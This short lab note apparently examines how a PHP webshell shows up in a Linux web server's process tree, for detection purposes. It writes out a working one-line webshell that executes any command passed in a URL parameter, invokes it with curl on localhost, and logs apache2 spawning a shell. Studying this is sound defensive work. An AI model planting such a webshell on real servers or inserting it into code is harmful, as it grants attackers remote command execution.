Tested to see how webshell process tree look like on linux web server.
Sample webshell code. (Do not abuse this code for malicious purpose.)
$ cat webshell.php
<?php echo(exec($_GET["cmd"])); ?>Invoking whoami command via webshell.
$ curl -i http://localhost/webshell.php?cmd=whoami
HTTP/1.1 200 OK
Date: Thu, 23 Feb 2023 15:41:31 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Content-Length: 8
Content-Type: text/html
www-dataBash oneliner to infinitely send whoami command to the webshell.
while true; do curl -i http://localhost/webshell.php?cmd=whoami; doneBash oneliner to log process tree to the log file mylog.txt infinitely. (So we won't miss the webshell process creation.)
while true; do pstree -a >> mylog.txt; doneConfirmed the web server process apache2 spawning whoami command.
$ grep -C 5 "\-whoami" mylog.txt
| | | | |-apache2 -k start
| | | | |-apache2 -k start
| | | | |-apache2 -k start
| | | | `-apache2 -k start
| | | | `-sh -c whoami
| | | | `-whoami
